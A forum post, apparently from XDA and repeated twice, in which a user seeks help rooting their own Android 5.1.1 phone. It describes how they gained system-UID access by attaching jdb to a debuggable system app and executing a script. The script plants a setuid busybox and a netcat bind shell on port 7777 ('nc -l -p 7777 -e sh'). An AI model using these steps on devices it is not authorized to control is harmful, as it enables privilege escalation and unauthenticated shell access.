Hello, i am new to XDA. I am trying to jail-break my android device:
Android 5.1.1, Linux 3.10.49
This device is a rare brand and have no any unlock & flash mechanism.
Currently i have successfully got "system" user (UID 1000) by using a preinstalled DEBUGGABLE system app.
This user can only change /data directory etc, it can not change any file owned by root.
So any help to escalate "system" user to root user will be very appreciate.
the result of command "id":
This account can change /data/system/packages.xml etc, but can not change /system/*, nor chown/mount.....
It's CapBound is 0, too strict. And also can not disable SELinux.
Can anyone help me?
----------------------- PS: share how i get system user privilege, maybe helpful to others -----------------------
In a word, just use jdb to attache to the app then print new java.lang.Runtime().exec("sh /sdcard/my.sh").
First, i found a package appeared in Android Device Monitor's debuggable app list, e.x. com.example.app.
Then i use
got confirmed it use system UID, then
but failed due to "Package not found", i don't know why.
Then i try to use JDWP way.
Get the debuggable process ID:
There are some files need be upload(adb push .... ) before run the last command.
/sdcard/qj.sh:
/sdcard/busybox:
this file can be found at busybox.net/downloads/binaries/latest, choose ARM7v.
The above jdb command "print new java.lang.Runtime().exec("sh /sdcard/qj.sh")" will create a shell server listening at 7777 port, bridge input/output to sh.
So, to connect to the shell server,
then in this connection, input shell command.
Sorry: i forgot a very important step: to run the "print new ...." statement, i have to turn on screen, even touch the app so can be trapped into jdb.
---------That's all------------
Android 5.1.1, Linux 3.10.49
This device is a rare brand and have no any unlock & flash mechanism.
Currently i have successfully got "system" user (UID 1000) by using a preinstalled DEBUGGABLE system app.
This user can only change /data directory etc, it can not change any file owned by root.
So any help to escalate "system" user to root user will be very appreciate.
the result of command "id":
Code:
uid=1000(system)
gid=1000(system)
groups=1000(system)
1007(log)
1010(wifi)
1015(sdcard_rw)
1021(gps)
1023(media_rw)
1028(sdcard_r)
3001(net_bt_admin)
3002(net_bt)
3003(inet)
3004(net_raw)
3005(net_admin)
3006(net_bw_stats)
3009(qcom_diag)
9997(everybody)
41000(u0_a31000)
context=u:r:system_app:s0It's CapBound is 0, too strict. And also can not disable SELinux.
Can anyone help me?
----------------------- PS: share how i get system user privilege, maybe helpful to others -----------------------
In a word, just use jdb to attache to the app then print new java.lang.Runtime().exec("sh /sdcard/my.sh").
First, i found a package appeared in Android Device Monitor's debuggable app list, e.x. com.example.app.
Then i use
Code:
pm dump com.example.appCode:
run-as com.example.appThen i try to use JDWP way.
Get the debuggable process ID:
Code:
$ adb jdwp
9424
$ adb forward tcp:8600 jdwp:9424
$ jdb -attach localhost:8600
> threads
group system:
(java.lang.Thread)0x2a86 Signal Catcher ...
(java.lang.Thread)0x2a87 FinalizerWatchdogDaemon ...
...
group main:
(java.lang.Thread)0x2a8d main ...
(java.lang.Thread)0x2a8e Binder_1 ...
...
> thread 0x2a8d
main[1] stepi
>
stepi completed: "thread=main", android.os.MessageQueue.next()、row=145 bci=22
main[1] > print new java.lang.Runtime().exec("sh /sdcard/qj.sh")/sdcard/qj.sh:
Code:
date > /sdcard/log
cp -f /sdcard/busybox /data/ 2>> /sdcard/log || exit 1
chmod 4777 /data/busybox 2>> /sdcard/log || exit 1
(while true; do /data/busybox nc -l -p 7777 -e sh; done) >> /sdcard/log 2>&1 &
echo server OK >> /sdcard/logthis file can be found at busybox.net/downloads/binaries/latest, choose ARM7v.
The above jdb command "print new java.lang.Runtime().exec("sh /sdcard/qj.sh")" will create a shell server listening at 7777 port, bridge input/output to sh.
So, to connect to the shell server,
Code:
adb forward tcp:7777 tcp:7777
nc localhost 7777Sorry: i forgot a very important step: to run the "print new ...." statement, i have to turn on screen, even touch the app so can be trapped into jdb.
---------That's all------------
No comments:
Post a Comment